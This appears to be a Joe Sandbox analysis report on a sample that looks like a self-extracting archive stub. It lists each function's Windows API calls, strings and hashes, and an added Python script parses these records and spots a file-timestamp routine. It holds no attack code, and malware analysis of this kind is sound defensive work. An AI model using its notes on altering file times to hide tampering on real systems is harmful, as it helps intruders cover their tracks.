                                                                                                  • Opcode ID: b3da4da89dae7c12acf0f7096a15d00543006c0f61e951c798ac3383b6eeb505
                                                                                                  • Instruction ID: 7462d505dd7e322cc4499f76a96f3c702f546e001f4531f6cf2f67580081cda8
                                                                                                  • Opcode Fuzzy Hash: b3da4da89dae7c12acf0f7096a15d00543006c0f61e951c798ac3383b6eeb505
                                                                                                  • Instruction Fuzzy Hash: F151DE72601226BFEB29CF14F845BAA73A8FF94310F24456DEC45472A9E771ED80DB90
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0092BF39
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0092BF5C
                                                                                                    • Part of subcall function 00928E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0092CA2C,00000000,?,00926CBE,?,00000008,?,009291E0,?,?,?), ref: 00928E38
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0092BF82
                                                                                                  • _free.LIBCMT ref: 0092BF95
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0092BFA4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 336800556-0
                                                                                                  • Opcode ID: 7c68c17b9acd8e2d1a2c65c47a2811d91ada1a21d36ac6f00ff65a43053ec6c6
                                                                                                  • Instruction ID: 548d00d36c7fec9bcdd15158f22c9a5ed9d81c65314d34b8cca207823142f7e9
                                                                                                  • Opcode Fuzzy Hash: 7c68c17b9acd8e2d1a2c65c47a2811d91ada1a21d36ac6f00ff65a43053ec6c6
                                                                                                  • Instruction Fuzzy Hash: C901F77261AB317F232126B67D4DDBB6BADDEC2BA03154129F908C2149EF60CD0199B0
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,?,009291AD,0092B188,?,00929813,00000001,00000364,?,00923F73,00000050,?,00941030,00000200), ref: 0092986E
                                                                                                  • _free.LIBCMT ref: 009298A3
                                                                                                  • _free.LIBCMT ref: 009298CA
                                                                                                  • SetLastError.KERNEL32(00000000,?,00941030,00000200), ref: 009298D7
                                                                                                  • SetLastError.KERNEL32(00000000,?,00941030,00000200), ref: 009298E0
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3170660625-0
                                                                                                  APIs
                                                                                                    • Part of subcall function 009111CF: ResetEvent.KERNEL32(?), ref: 009111E1
                                                                                                    • Part of subcall function 009111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 009111F5
                                                                                                  • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00910F21
                                                                                                  • CloseHandle.KERNEL32(?,?), ref: 00910F3B
                                                                                                  • DeleteCriticalSection.KERNEL32(?), ref: 00910F54
                                                                                                  • CloseHandle.KERNEL32(?), ref: 00910F60
                                                                                                  • CloseHandle.KERNEL32(?), ref: 00910F6C
                                                                                                    • Part of subcall function 00910FE4: WaitForSingleObject.KERNEL32(?,000000FF,00911206,?), ref: 00910FEA
                                                                                                    • Part of subcall function 00910FE4: GetLastError.KERNEL32(?), ref: 00910FF6
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                  • String ID:
                                                                                                  • API String ID: 1868215902-0
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 0092C817
                                                                                                    • Part of subcall function 00928DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?), ref: 00928DE2
                                                                                                    • Part of subcall function 00928DCC: GetLastError.KERNEL32(?,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?,?), ref: 00928DF4
                                                                                                  • _free.LIBCMT ref: 0092C829
                                                                                                  • _free.LIBCMT ref: 0092C83B
                                                                                                  • _free.LIBCMT ref: 0092C84D
                                                                                                  • _free.LIBCMT ref: 0092C85F
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  APIs
                                                                                                  • _wcslen.LIBCMT ref: 00911FE5
                                                                                                  • _wcslen.LIBCMT ref: 00911FF6
                                                                                                  • _wcslen.LIBCMT ref: 00912006
                                                                                                  • _wcslen.LIBCMT ref: 00912014
                                                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0090B371,?,?,00000000,?,?,?), ref: 0091202F
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen$CompareString
                                                                                                  • String ID:
                                                                                                  • API String ID: 3397213944-0
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 0092891E
                                                                                                    • Part of subcall function 00928DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?), ref: 00928DE2
                                                                                                    • Part of subcall function 00928DCC: GetLastError.KERNEL32(?,?,0092C896,?,00000000,?,00000000,?,0092C8BD,?,00000007,?,?,0092CCBA,?,?), ref: 00928DF4
                                                                                                  • _free.LIBCMT ref: 00928930
                                                                                                  • _free.LIBCMT ref: 00928943
                                                                                                  • _free.LIBCMT ref: 00928954
                                                                                                  • _free.LIBCMT ref: 00928965
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: _swprintf
                                                                                                  • String ID: %ls$%s: %s
                                                                                                  • API String ID: 589789837-2259941744
                                                                                                  APIs
                                                                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 009231FB
                                                                                                  • _abort.LIBCMT ref: 00923306
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: EncodePointer_abort
                                                                                                  • String ID: MOC$RCC
                                                                                                  • API String ID: 948111806-2084237596
                                                                                                  APIs
                                                                                                  • __EH_prolog.LIBCMT ref: 00907406
                                                                                                    • Part of subcall function 00903BBA: __EH_prolog.LIBCMT ref: 00903BBF
                                                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 009074CD
                                                                                                    • Part of subcall function 00907A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00907AAB
                                                                                                    • Part of subcall function 00907A9C: GetLastError.KERNEL32 ref: 00907AF1
                                                                                                    • Part of subcall function 00907A9C: CloseHandle.KERNEL32(?), ref: 00907B00
                                                                                                  Strings
                                                                                                  Similarity
                                                                                                  • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                  • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                  • API String ID: 3813983858-639343689
                                                                                                  APIs
                                                                                                    • Part of subcall function 00901316: GetDlgItem.USER32(00000000,00003021), ref: 0090135A
                                                                                                    • Part of subcall function 00901316: SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
                                                                                                  • EndDialog.USER32(?,00000001), ref: 0091AD98
                                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0091ADAD
                                                                                                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 0091ADC2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemText$DialogWindow
                                                                                                  • String ID: ASKNEXTVOL
                                                                                                  • API String ID: 445417207-3402441367
                                                                                                  • Opcode ID: ffcc18616b73378bcc8f5b06d7577ff27b5bee4a3f7d657cea66848d0cdcf017
                                                                                                  • Instruction ID: 2ce18fe26950140430847fb8c34a55de1f7de6c2e192dbd33a7185971345c029
                                                                                                  • Opcode Fuzzy Hash: ffcc18616b73378bcc8f5b06d7577ff27b5bee4a3f7d657cea66848d0cdcf017
                                                                                                  • Instruction Fuzzy Hash: AC11D336349604BFD3128F68EC45FEA37ADEB4B702F044408F241DB4E4C7A69D85A722
                                                                                                  APIs
                                                                                                  • __fprintf_l.LIBCMT ref: 0090D954
                                                                                                  • _strncpy.LIBCMT ref: 0090D99A
                                                                                                    • Part of subcall function 00911DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00941030,00000200,0090D928,00000000,?,00000050,00941030), ref: 00911DC4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                  • String ID: $%s$@%s
                                                                                                  • API String ID: 562999700-834177443
                                                                                                  • Opcode ID: a4c994f6bb421729233d2f03f407bf9dc28bfda51f5d4265b177995aabca8065
                                                                                                  • Instruction ID: 8a7e784fc9d11dd529896ee335e119d15b8454b1b7936b618ba03885e355d2da
                                                                                                  • Opcode Fuzzy Hash: a4c994f6bb421729233d2f03f407bf9dc28bfda51f5d4265b177995aabca8065
                                                                                                  • Instruction Fuzzy Hash: 3621AF7654224CAEEF20EEE8CC01FEE7BACAF45704F044422F920961E2E272D648CF51
                                                                                                  APIs
                                                                                                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0090AC5A,00000008,?,00000000,?,0090D22D,?,00000000), ref: 00910E85
                                                                                                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0090AC5A,00000008,?,00000000,?,0090D22D,?,00000000), ref: 00910E8F
                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0090AC5A,00000008,?,00000000,?,0090D22D,?,00000000), ref: 00910E9F
                                                                                                  Strings
                                                                                                  • Thread pool initialization failed., xrefs: 00910EB7
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                  • String ID: Thread pool initialization failed.
                                                                                                  • API String ID: 3340455307-2182114853
                                                                                                  • Opcode ID: cd3b22e093cf50286d8bcb7402816e0d4072de7376cc41667865ee98da839c70
                                                                                                  • Instruction ID: 34e9e7a15a571a30709ed1a267bbd0e0e310dddbe5394bbf5bbbccf1ed862f2d
                                                                                                  • Opcode Fuzzy Hash: cd3b22e093cf50286d8bcb7402816e0d4072de7376cc41667865ee98da839c70
                                                                                                  • Instruction Fuzzy Hash: 23118FB16447089FD3215F669C84AA7FBECEB94744F14482EE1DAC2200D6B259809B50
                                                                                                  APIs
                                                                                                    • Part of subcall function 00901316: GetDlgItem.USER32(00000000,00003021), ref: 0090135A
                                                                                                    • Part of subcall function 00901316: SetWindowTextW.USER32(00000000,009335F4), ref: 00901370
                                                                                                  • EndDialog.USER32(?,00000001), ref: 0091B2BE
                                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0091B2D6
                                                                                                  • SetDlgItemTextW.USER32(?,00000067,?), ref: 0091B304
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ItemText$DialogWindow
                                                                                                  • String ID: GETPASSWORD1
                                                                                                  • API String ID: 445417207-3292211884
                                                                                                  • Opcode ID: dbb5520a21ceadd10355f5e2302cceddbe97951e68e37e1f35e86f6db82faec2
                                                                                                  • Instruction ID: e38c8d37bf77623aad189ec1c6176138a60fa39ee49c42a830bc18c86ac1f928
                                                                                                  • Opcode Fuzzy Hash: dbb5520a21ceadd10355f5e2302cceddbe97951e68e37e1f35e86f6db82faec2
                                                                                                  • Instruction Fuzzy Hash: 52110432A0411CBADB219A649D59FFF376DEF5A700F000824FA55F20C0C7B5AA999761
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                  • API String ID: 0-56093855
                                                                                                  • Opcode ID: 5a0e62c3f88a3bcd51f0295ac68681d6c6e841c9b6297dcb1d270daebcf4717c
                                                                                                  • Instruction ID: 9357014f0315ad1a546bd528a7359bcc088f9c306de4fb73fb3a4c6b47a2b804
                                                                                                  • Opcode Fuzzy Hash: 5a0e62c3f88a3bcd51f0295ac68681d6c6e841c9b6297dcb1d270daebcf4717c
                                                                                                  • Instruction Fuzzy Hash: ED019E7EB29249AFC7219F54FC04DDB3BA9E74A354B00042AF905926B0C6319890FBA0
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __alldvrm$_strrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1036877536-0
                                                                                                  • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                  • Instruction ID: da5d6ec90517256279edded407c6ab9aa6211546402c608a1452c258b27257b3
                                                                                                  • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                                                                  • Instruction Fuzzy Hash: ACA15A72E043A69FEB25CF28E8917AEBBE9EF55310F18456DE4899B385C3388D41C750
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00907F69,?,?,?), ref: 0090A3FA
                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00907F69,?), ref: 0090A43E
                                                                                                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00907F69,?,?,?,?,?,?,?), ref: 0090A4BF
                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000800,?,00907F69,?,?,?,?,?,?,?,?,?,?), ref: 0090A4C6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$Create$CloseHandleTime
                                                                                                  • String ID:
                                                                                                  • API String ID: 2287278272-0
                                                                                                  • Opcode ID: 51cf432c8e865de9edd32d1f2285efd0d112abb8f259272d0d7a84534a4cebc9
                                                                                                  • Instruction ID: 896f4d09d3fb08dfc6b2ddd32ac6f5625a31f269888b5021e982bee4f455b38e
                                                                                                  • Opcode Fuzzy Hash: 51cf432c8e865de9edd32d1f2285efd0d112abb8f259272d0d7a84534a4cebc9
                                                                                                  • Instruction Fuzzy Hash: 87418C31288381AEE721DF24DC45BEEBBE8AB85700F044919B6E1D71D1D6A49A489B93
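The API lines in these function records all have one fixed shape (`• Name.MODULE(args), ref: ADDR`, with a `Part of subcall function XXXX:` prefix for callees and `?` for argument slots the sandbox did not recover), so they can be parsed and the raw hex turned into Win32 constant names. The script below is an added example for this page, not Joe Sandbox code: `RECORD` is copied verbatim from the CreateFileW/SetFileTime record above, while the parser, the constant tables (values from the Windows SDK headers) and the `is_timestamp_routine` heuristic are the example's own. It assumes that entries past an API's own parameter count are further stack slots the report dumps and ignores them.

```python
"""Parser for the per-function API records in this Joe Sandbox report (added
example, not Joe Sandbox code). RECORD is copied from the report; the parser,
the Win32 constant tables and the heuristic are the example's own."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Copied from the File$Create$CloseHandleTime record above.
RECORD = """\
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00907F69,?,?,?), ref: 0090A3FA
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00907F69,?), ref: 0090A43E
• SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00907F69,?,?,?,?,?,?,?), ref: 0090A4BF
• CloseHandle.KERNEL32(?,?,?,00000800,?,00907F69,?,?,?,?,?,?,?,?,?,?), ref: 0090A4C6
"""

# "• [Part of subcall function XXXX: ]Name.MODULE[(args)], ref: ADDR"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[Optional[int]]         # None where the report shows '?'
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # for "Part of subcall function" lines


def parse_args(text):
    toks = [t.strip() for t in text.split(",") if t.strip()]
    return [None if t == "?" else int(t, 16) for t in toks]


def parse_record(text):
    """Return the ApiCall entries of one function record, in report order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            calls.append(ApiCall(m["name"], m["module"], parse_args(m["args"] or ""),
                                 int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
    return calls


# Win32 constants (Windows SDK winnt.h / fileapi.h), subset relevant here.
ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
          (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
SHARE = [(0x1, "FILE_SHARE_READ"), (0x2, "FILE_SHARE_WRITE"), (0x4, "FILE_SHARE_DELETE")]
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FLAGS = [(0x02000000, "FILE_FLAG_BACKUP_SEMANTICS"), (0x04000000, "FILE_FLAG_DELETE_ON_CLOSE"),
         (0x00200000, "FILE_FLAG_OPEN_REPARSE_POINT"), (0x80000000, "FILE_FLAG_WRITE_THROUGH"),
         (0x00000080, "FILE_ATTRIBUTE_NORMAL")]


def _bits(value, table):
    """Expand a bitmask into names; bits not in the table are kept as hex."""
    if value is None:
        return ["?"]
    names = []
    for bit, name in table:
        if value & bit:
            names.append(name)
            value &= ~bit
    return names + ([hex(value)] if value else [])


def decode_create_file(call):
    """Name the CreateFileW parameters. Assumption: the first seven entries are
    the call's arguments and the report appends further stack slots after them."""
    if call.name != "CreateFileW" or len(call.args) < 7:
        raise ValueError("not a fully recorded CreateFileW call")
    a = call.args
    return {"access": _bits(a[1], ACCESS), "share": _bits(a[2], SHARE),
            "disposition": "?" if a[4] is None else DISPOSITION.get(a[4], hex(a[4])),
            "flags": _bits(a[5], FLAGS)}


def is_timestamp_routine(calls):
    """Heuristic of this example: a CreateFileW with GENERIC_WRITE followed, in
    call-site order, by SetFileTime is the shape of a "restore file times" helper."""
    opened = False
    for c in sorted(calls, key=lambda k: k.ref):
        if c.name == "CreateFileW" and len(c.args) > 1 and (c.args[1] or 0) & 0x40000000:
            opened = True
        elif c.name == "SetFileTime" and opened:
            return True
    return False
```

Run against the record above, `decode_create_file` reports GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, OPEN_EXISTING and FILE_FLAG_BACKUP_SEMANTICS for both CreateFileW calls. The backup-semantics flag is the detail worth noting: it is what lets CreateFileW return a handle to a directory as well as a file, so the SetFileTime that follows can stamp either. The heuristic only says the routine has that shape; whether the times written are the archive's originals or attacker-chosen values is not visible from the API list alone.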
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1675659539.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675697794.0000000000933000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.000000000093E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000945000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675712184.0000000000962000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1675765392.0000000000963000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_900000_hz7DzW2Yop.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 176396367-0
                                                                                                  • Opcode ID: 9fa8675f0ca0d430c6867806173b48de0a7fd3416e6cfc1727dcedf91f568b8c
                                                                                                  • Instruction ID: cc6a6c14aa35f8e6437033f3545691e119b7286eaca48a1838d2b5dda3d07a5e
                                                                                                  • Opcode Fuzzy Hash: 9fa8675f0ca0d430c6867806173b48de0a7fd3416e6cfc1727dcedf91f568b8c
                                                                                                  • Instruction Fuzzy Hash: 7041C771A006699FCB259F688C05AEF7BBCEF41310F004119FD45F7245DB74AE998BA4
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,009291E0,?,00000000,?,00000001,?,?,00000001,009291E0,?), ref: 0092C9D5
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0092CA5E
                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00926CBE,?), ref: 0092CA70
                                                                                                  • __freea.LIBCMT ref: 0092CA79
                                                                                                    • Part of subcall function 00928E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0092CA2C,00000000,?,00926CBE,?,00000008,?,009291E0,?,?,?), ref: 00928E38
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1675672511.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
